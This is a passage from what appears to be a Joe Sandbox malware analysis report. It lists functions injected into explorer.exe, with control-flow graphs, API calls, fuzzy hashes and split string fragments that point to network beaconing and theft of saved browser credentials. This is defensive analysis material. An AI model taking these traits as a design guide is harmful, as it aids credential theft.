                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: a64fed258c1380dcb3a03070e5449d284674ac7e388b6618c10d5dc025edba51
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 9921E131610A4CCECB14EFA8C8887EDBBE0FF58204F40462AD45AD7361DF748A04CB89
                                                                                                                                                  Function 0E7E7B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 232 e7e7b66-e7e7b68 233 e7e7b6a-e7e7b71 232->233 234 e7e7b93-e7e7bb8 232->234 236 e7e7bbb-e7e7c22 call e7ee612 call e7f0942 * 2 233->236 237 e7e7b73-e7e7b92 233->237 234->236 244 e7e7cdc 236->244 245 e7e7c28-e7e7c2b 236->245 237->234 246 e7e7cde-e7e7cf6 244->246 245->244 247 e7e7c31-e7e7cb0 call e7f2da4 call e7f2022 call e7f23e2 call e7f2022 call e7f23e2 245->247 259 e7e7cb5-e7e7cca CreateMutexExW 247->259 260 e7e7cce-e7e7cd3 259->260 260->244 261 e7e7cd5-e7e7cda 260->261 261->246
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                  • Instruction ID: a4739ffbb3585d654e852a79893211270386a37fce0a3bc99eb17d3967984c7a
                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                  • Instruction Fuzzy Hash: 61414D70918A08CFDB54EFA8C8D97AD77E0FB58300F44466AC94EDB366DE309945CB85
                                                                                                                                                  Function 0E7E7B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                  • Instruction ID: 832404701bcfc9e7fd6b52f5e828013b00111f532d387cc9c3dd738628317517
                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                  • Instruction Fuzzy Hash: 83415C70918A08CFDB94EFA8C8D97AD77E0FF68300F44456AC94EDB266DE309945CB85
                                                                                                                                                  Function 0E7ED72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 289 e7ed72e-e7ed768 290 e7ed76a-e7ed782 call e7f0942 289->290 291 e7ed788-e7ed7ab connect 289->291 290->291
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: connect
                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                  • Instruction ID: 4026a15804bb888e4f42fee30dfaeeeb0c87acfac29be4aa630a658a77d8e672
                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                  • Instruction Fuzzy Hash: 4C015A34618B188FCB94EF1CE088B55B7E0FB58324F1545AEE90DCB226CA74CC818BC2
                                                                                                                                                  Function 0E7ED732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 294 e7ed732-e7ed768 295 e7ed76a-e7ed782 call e7f0942 294->295 296 e7ed788-e7ed7ab connect 294->296 295->296
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: connect
                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                  • Instruction ID: 4ade677a3f9090fd6e35fc5b0d06cd821a7506d0b7ae391006e029e9f118a8fc
                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                  • Instruction Fuzzy Hash: 35012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1545AEE90DCB226CA74CD818BC2
                                                                                                                                                  Function 0E7ED6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 407 e7ed6b2-e7ed6e5 408 e7ed6e7-e7ed6ff call e7f0942 407->408 409 e7ed705-e7ed72d send 407->409 408->409
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: send
                                                                                                                                                  • String ID: send
                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                  • Instruction ID: efc80d7e777b110dbdedbe7f7ad3dd9b8461bd67cc9608908d2473f47e0978e5
                                                                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                  • Instruction Fuzzy Hash: F9011270518A188FDB84EF1CD448B2577E0EB58314F1545AED95DCB366D670D8818B81
                                                                                                                                                  Function 0E7ED5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 412 e7ed5b2-e7ed5ea 413 e7ed5ec-e7ed604 call e7f0942 412->413 414 e7ed60a-e7ed62b socket 412->414 413->414
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket
                                                                                                                                                  • String ID: sock
                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                  • Instruction ID: b93265869d1eb8877474a5cd39c3c6da0ce0becfc6a45f8f72ddb88d43655774
                                                                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                  • Instruction Fuzzy Hash: 2A0121706186188FCB84EF1CD048B54BBE0FB59354F1545ADD55ECB376D7B0C9818B86
                                                                                                                                                  Function 0E7E52DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 417 e7e52dd-e7e5320 call e7f0942 420 e7e53fa-e7e540e 417->420 421 e7e5326 417->421 422 e7e5328-e7e5339 SleepEx 421->422 422->422 423 e7e533b-e7e5341 422->423 424 e7e534b-e7e5352 423->424 425 e7e5343-e7e5349 423->425 427 e7e5354-e7e535a 424->427 428 e7e5370-e7e5376 424->428 425->424 426 e7e535c-e7e536a call e7eff12 425->426 426->428 427->426 427->428 430 e7e5378-e7e537e 428->430 431 e7e53b7-e7e53bd 428->431 430->431 433 e7e5380-e7e538a 430->433 434 e7e53bf-e7e53cf call e7e5e72 431->434 435 e7e53d4-e7e53db 431->435 433->431 437 e7e538c-e7e53b1 call e7e6432 433->437 434->435 435->422 436 e7e53e1-e7e53f5 call e7e50f2 435->436 436->422 437->431
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                  • Instruction ID: e9dafdb2c661c4d420b6cafd19fc1ee89f2836310abe8a7cce5afc65e7a1ce9b
                                                                                                                                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                  • Instruction Fuzzy Hash: EA316B74614B0DDFDB64EF6980882A5F7A0FB58308F44467EC92DCB616CBB49860CF91
                                                                                                                                                  Function 0E7E5412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 453 e7e5412-e7e5446 call e7f0942 456 e7e5448-e7e5472 call e7f2c9e CreateThread 453->456 457 e7e5473-e7e547d 453->457
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176622170.000000000E710000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e710000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                  • Instruction ID: 736ba85738e628d4b26863de168ee4a1c493be7691008e123c927e48e50c0da0
                                                                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                  • Instruction Fuzzy Hash: 29F0C230268A484FD788EF2CD48562AB3D0EBA9215F444A3EE64DC3365DA29C9828716

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0E661D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                  • API String ID: 0-393284711
                                                                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction ID: 5e2d46236654920c757fe4360ee4daca5d73d48a43cf69221f878ce2135dc5f7
                                                                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction Fuzzy Hash: A3E14974628F488FC764EF68D4947AAB7E0FB58300F504A2E95AFC7255DF30A941CB89
                                                                                                                                                  Function 0E598D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                  • API String ID: 0-393284711
                                                                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction ID: 78a389c3b1d093493047b592cb66422e0ce690446f130c1087d53e3ff5931d89
                                                                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction Fuzzy Hash: 4EE13CB4618F488FCB64EF68D4947AAB7E0FB98300F504E2E969BC7255DF30A941CB45
                                                                                                                                                  Function 0F6E1D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                  • API String ID: 0-393284711
                                                                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction ID: a26079c56d686cdcc7213e83138f565636f973a5d3304a011bbabf4146339774
                                                                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                  • Instruction Fuzzy Hash: BDE17971628B488FC764EF68C4947EAB7E1FB58301F404A2E95AFC7246DF34A541CB89
                                                                                                                                                  Function 0E664792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                  • API String ID: 0-2916316912
                                                                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction ID: 60fb4c3022ca451c89b3775732072d6515a1afce1eb5704fe081c827262188d1
                                                                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction Fuzzy Hash: 76B17C30528B488EDB59EF68D489AEEB7F1FF98300F50491ED49AC7251EF709905CB86
                                                                                                                                                  Function 0E59B792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                  • API String ID: 0-2916316912
                                                                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction ID: db69825a1b7796bdd1344531f5db47edc8b349caa2753ed77b37cadd30af6090
                                                                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction Fuzzy Hash: 42B19A30618B488EDB54EF68D485AEEB7F1FF98300F50491ED59AC7251EF709909CB86
                                                                                                                                                  Function 0F6E4792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                  • API String ID: 0-2916316912
                                                                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction ID: bd5ae1d98399ef236484b4f830483a648b3a1c77897c9dd2e9472511d2f605fb
                                                                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                  • Instruction Fuzzy Hash: 98B18B31518B488EDB59EF68C485AEEB7F1FF98300F50491ED49AC7252EF74A409CB86
                                                                                                                                                  Function 0E662622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction ID: c60bee3c3a1510a16f38034ac1d09a3e64be2573276e9cef1b12e8fb152a78a1
                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction Fuzzy Hash: 2341B070A28B088FDB18DF88B4656AD7BF6FB48700F00025ED409E7355DBB5AD458BD6
                                                                                                                                                  Function 0E599622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction ID: 8112d0a373bd90378ead5c39044377808277f0973c80ef457892535071e74154
                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction Fuzzy Hash: 3F41D070A18B088FDF14DF88A4457BE7BE2FB88700F00065ED80AD3245DBB59D458BD6
                                                                                                                                                  Function 0F6E2622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction ID: 38a4dd699699f37933ad74f56680786e6aba8b2491365efdea4123b8c91a03d1
                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                  • Instruction Fuzzy Hash: F741B071A18B088FDF18DF88A4656AD7BF6FB48700F40025ED409D3346DBB5AD458BD6
                                                                                                                                                  Function 0E669AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: ee4d0e9f3ec27e8a14020aa5ed6fb814a3f194ae73d4cff3bf45766b071d5eef
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 39C14C70228B099FC758EF64D4956EAF7E1FF94304F504B1E94AAC7210DF30A915CB8A
                                                                                                                                                  Function 0E5A0AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: 46dcd6ab209218711096af32ab62acac9ba1d174f5935aa814ab460396141b2e
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 55C17C74228B098FC758EF24C4956EAF3E5FB94304F444B2E969EC7250DF70A915CB86
                                                                                                                                                  Function 0F6E9AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction ID: ae936ef25afe6862fc453e98aef32a3d2ae2a861ebdf17a234ade8743c6c65a9
                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                  • Instruction Fuzzy Hash: 7BC16971618B098FC758EF68C485AEAF3E1FF98304F50472E959AC7211DF34A615CB8A
                                                                                                                                                  Function 0E669F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: 04f8a78c667226b9ef295066eabc2ec038de7312f21c13588c1ccfefb8ad2057
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 6951F37112C7488FD719DF58D8852AAB7E5FBC5704F501A2EE8CBC7241DBB49906CB82
                                                                                                                                                  Function 0E5A0F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
